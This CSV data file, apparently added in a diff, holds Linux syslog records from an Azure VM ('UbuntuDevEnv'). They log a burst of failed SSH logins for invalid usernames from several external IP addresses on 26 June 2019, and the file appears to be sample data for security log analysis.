+18105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:57,UbuntuDevEnv,2019-06-26 09:36:56,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 48560:11: Bye Bye [preauth],73298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,48560,,
+18106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:57,UbuntuDevEnv,2019-06-26 09:36:56,auth,UbuntuDevEnv,info,Disconnected from invalid user jacinta.cali 165.22.203.187 port 48560 [preauth],73298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacinta,165.22.203.1,48560,,
+18107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:33,UbuntuDevEnv,2019-06-26 09:37:33,auth,UbuntuDevEnv,info,Invalid user arc from 176.31.43.255 port 49972,73431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arc,176.31.43.2,49972,,
+18108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:33,UbuntuDevEnv,2019-06-26 09:37:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,73431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+18109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:33,UbuntuDevEnv,2019-06-26 09:37:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:36,UbuntuDevEnv,2019-06-26 09:37:35,auth,UbuntuDevEnv,info,Failed password for invalid user arc from 176.31.43.255 port 49972 ssh2,73431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arc,176.31.43.2,49972,,
+18111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:36,UbuntuDevEnv,2019-06-26 09:37:35,auth,UbuntuDevEnv,info,Disconnected from invalid user arc 176.31.43.255 port 49972 [preauth],73431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arc,176.31.43.2,49972,,
+18112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:36,UbuntuDevEnv,2019-06-26 09:37:35,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 49972:11: Bye Bye [preauth],73431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,49972,,
+18113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:36,UbuntuDevEnv,2019-06-26 09:37:35,auth,UbuntuDevEnv,info,Invalid user abel from 187.6.249.142 port 54228,73436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abel,187.6.249.1,54228,,
+18114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:36,UbuntuDevEnv,2019-06-26 09:37:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:36,UbuntuDevEnv,2019-06-26 09:37:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,73436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:36,UbuntuDevEnv,2019-06-26 09:37:36,auth,UbuntuDevEnv,info,Invalid user Waschlappen from 176.31.202.90 port 51608,73442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Waschlappen,176.31.202.9,51608,,
+18117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:36,UbuntuDevEnv,2019-06-26 09:37:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:36,UbuntuDevEnv,2019-06-26 09:37:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,73442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:38,UbuntuDevEnv,2019-06-26 09:37:38,auth,UbuntuDevEnv,info,Failed password for invalid user abel from 187.6.249.142 port 54228 ssh2,73436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abel,187.6.249.1,54228,,
+18120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:38,UbuntuDevEnv,2019-06-26 09:37:38,auth,UbuntuDevEnv,info,Disconnected from invalid user abel 187.6.249.142 port 54228 [preauth],73436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abel,187.6.249.1,54228,,
+18121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:38,UbuntuDevEnv,2019-06-26 09:37:38,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 54228:11: Bye Bye [preauth],73436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,54228,,
+18122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:38,UbuntuDevEnv,2019-06-26 09:37:38,auth,UbuntuDevEnv,info,Failed password for invalid user Waschlappen from 176.31.202.90 port 51608 ssh2,73442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Waschlappen,176.31.202.9,51608,,
+18123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:38,UbuntuDevEnv,2019-06-26 09:37:38,auth,UbuntuDevEnv,info,Disconnected from invalid user Waschlappen 176.31.202.90 port 51608 [preauth],73442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Waschlappen,176.31.202.9,51608,,
+18124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:37:38,UbuntuDevEnv,2019-06-26 09:37:38,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 51608:11: Bye Bye [preauth],73442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,51608,,
+18125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:16,UbuntuDevEnv,2019-06-26 09:38:16,auth,UbuntuDevEnv,info,Invalid user trevor from 165.22.203.187 port 42018,73598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trevor,165.22.203.1,42018,,
+18126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:16,UbuntuDevEnv,2019-06-26 09:38:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:16,UbuntuDevEnv,2019-06-26 09:38:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,73598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+18128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:17,UbuntuDevEnv,2019-06-26 09:38:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73591,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:17,UbuntuDevEnv,2019-06-26 09:38:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,73591,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:17,UbuntuDevEnv,2019-06-26 09:38:17,auth,UbuntuDevEnv,info,Invalid user von from 115.159.216.187 port 53582,73591,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,von,115.159.216.1,53582,,
+18131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:18,UbuntuDevEnv,2019-06-26 09:38:18,auth,UbuntuDevEnv,info,Failed password for invalid user trevor from 165.22.203.187 port 42018 ssh2,73598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trevor,165.22.203.1,42018,,
+18132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:18,UbuntuDevEnv,2019-06-26 09:38:18,auth,UbuntuDevEnv,info,Disconnected from invalid user trevor 165.22.203.187 port 42018 [preauth],73598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trevor,165.22.203.1,42018,,
+18133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:18,UbuntuDevEnv,2019-06-26 09:38:18,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 42018:11: Bye Bye [preauth],73598,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,42018,,
+18134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:19,UbuntuDevEnv,2019-06-26 09:38:19,auth,UbuntuDevEnv,info,Failed password for invalid user von from 115.159.216.187 port 53582 ssh2,73591,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,von,115.159.216.1,53582,,
+18135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:19,UbuntuDevEnv,2019-06-26 09:38:19,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 53582:11: Bye Bye [preauth],73591,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,53582,,
+18136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:19,UbuntuDevEnv,2019-06-26 09:38:19,auth,UbuntuDevEnv,info,Disconnected from invalid user von 115.159.216.187 port 53582 [preauth],73591,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,von,115.159.216.1,53582,,
+18137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:54,UbuntuDevEnv,2019-06-26 09:38:53,auth,UbuntuDevEnv,info,Invalid user admin from 176.31.43.255 port 58090,73725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.43.2,58090,,
+18138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:54,UbuntuDevEnv,2019-06-26 09:38:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:54,UbuntuDevEnv,2019-06-26 09:38:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,73725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+18140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:55,UbuntuDevEnv,2019-06-26 09:38:55,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 176.31.43.255 port 58090 ssh2,73725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.43.2,58090,,
+18141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:55,UbuntuDevEnv,2019-06-26 09:38:55,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 176.31.43.255 port 58090 [preauth],73725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.43.2,58090,,
+18142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:38:55,UbuntuDevEnv,2019-06-26 09:38:55,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 58090:11: Bye Bye [preauth],73725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,58090,,
+18143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:00,UbuntuDevEnv,2019-06-26 09:39:00,auth,UbuntuDevEnv,info,Invalid user trevor from 176.31.202.90 port 40180,73752,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trevor,176.31.202.9,40180,,
+18144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:00,UbuntuDevEnv,2019-06-26 09:39:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,73752,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:00,UbuntuDevEnv,2019-06-26 09:39:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73752,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:02,UbuntuDevEnv,2019-06-26 09:39:02,auth,UbuntuDevEnv,info,Failed password for invalid user trevor from 176.31.202.90 port 40180 ssh2,73752,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trevor,176.31.202.9,40180,,
+18147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:02,UbuntuDevEnv,2019-06-26 09:39:02,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 40180:11: Bye Bye [preauth],73752,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,40180,,
+18148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:02,UbuntuDevEnv,2019-06-26 09:39:02,auth,UbuntuDevEnv,info,Disconnected from invalid user trevor 176.31.202.90 port 40180 [preauth],73752,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trevor,176.31.202.9,40180,,
+18149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:26,UbuntuDevEnv,2019-06-26 09:39:25,auth,UbuntuDevEnv,info,Invalid user samuel from 187.6.249.142 port 42888,73843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samuel,187.6.249.1,42888,,
+18150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:26,UbuntuDevEnv,2019-06-26 09:39:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,73843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:26,UbuntuDevEnv,2019-06-26 09:39:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:28,UbuntuDevEnv,2019-06-26 09:39:28,auth,UbuntuDevEnv,info,Failed password for invalid user samuel from 187.6.249.142 port 42888 ssh2,73843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samuel,187.6.249.1,42888,,
+18153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:28,UbuntuDevEnv,2019-06-26 09:39:28,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 42888:11: Bye Bye [preauth],73843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,42888,,
+18154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:28,UbuntuDevEnv,2019-06-26 09:39:28,auth,UbuntuDevEnv,info,Disconnected from invalid user samuel 187.6.249.142 port 42888 [preauth],73843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samuel,187.6.249.1,42888,,
+18155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:38,UbuntuDevEnv,2019-06-26 09:39:38,auth,UbuntuDevEnv,info,Invalid user ir from 165.22.203.187 port 35520,73887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ir,165.22.203.1,35520,,
+18156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:38,UbuntuDevEnv,2019-06-26 09:39:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:38,UbuntuDevEnv,2019-06-26 09:39:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,73887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+18158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:40,UbuntuDevEnv,2019-06-26 09:39:39,auth,UbuntuDevEnv,info,Failed password for invalid user ir from 165.22.203.187 port 35520 ssh2,73887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ir,165.22.203.1,35520,,
+18159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:40,UbuntuDevEnv,2019-06-26 09:39:39,auth,UbuntuDevEnv,info,Disconnected from invalid user ir 165.22.203.187 port 35520 [preauth],73887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ir,165.22.203.1,35520,,
+18160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:39:40,UbuntuDevEnv,2019-06-26 09:39:39,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 35520:11: Bye Bye [preauth],73887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,35520,,
+18161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:02,UbuntuDevEnv,2019-06-26 09:40:02,auth,UbuntuDevEnv,info,Invalid user timemachine from 115.159.216.187 port 33315,73968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,timemachine,115.159.216.1,33315,,
+18162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:02,UbuntuDevEnv,2019-06-26 09:40:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:02,UbuntuDevEnv,2019-06-26 09:40:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,73968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:40:04,UbuntuDevEnv,2019-06-26 09:40:04,auth,UbuntuDevEnv,info,Failed password for invalid user timemachine from 115.159.216.187 port 33315 ssh2,73968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,timemachine,115.159.216.1,33315,,
